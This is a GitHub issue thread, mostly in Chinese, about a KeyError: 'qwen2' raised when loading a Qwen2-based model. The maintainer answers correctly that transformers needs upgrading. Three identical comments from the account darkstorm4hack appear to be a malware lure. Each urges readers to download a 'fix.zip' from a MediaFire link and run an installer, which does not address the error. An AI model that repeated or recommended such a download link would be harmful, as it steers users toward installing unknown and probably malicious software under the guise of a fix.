### ISSUE TITLE
运行basic_usage.py以及continuous_conversation.py会报错无法使用

### ISSUE THREAD

**Issue by xia0zha0nb** [ystemsrx/Qwen2-Boundless#3]
**已经将huggingface上的数据和模型都下载了，Python环境和其他模块都安装好了依然报错**
Traceback (most recent call last):
  File "E:\Desktop\Qwen2-Boundless-main\basic_usage.py", line 7, in <module>
    model = AutoModelForCausalLM.from_pretrained(
  File "C:\Users\小赵\AppData\Roaming\Python\Python310\site-packages\transformers\models\auto\auto_factory.py", line 434, in from_pretrained
    config, kwargs = AutoConfig.from_pretrained(
  File "C:\Users\小赵\AppData\Roaming\Python\Python310\site-packages\transformers\models\auto\configuration_auto.py", line 796, in from_pretrained
    config_class = CONFIG_MAPPING[config_dict["model_type"]]
  File "C:\Users\小赵\AppData\Roaming\Python\Python310\site-packages\transformers\models\auto\configuration_auto.py", line 503, in __getitem__
    raise KeyError(key)
**_KeyError: 'qwen2'_**

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by ystemsrx** [comment]
您好，这是您Transformers库的原因，在Qwen2官方模型库中有提到[点击此处跳转](https://huggingface.co/Qwen/Qwen2-1.5B-Instruct)，原文如下：

## Requirements

The code of Qwen2 has been in the latest Hugging face transformers and we advise you to install `transformers>=4.37.0`, or you might encounter the following error:
```
KeyError: 'qwen2'
```

您可能需要更新transformers库来运行，执行`pip install --upgrade transformers`再执行代码尝试
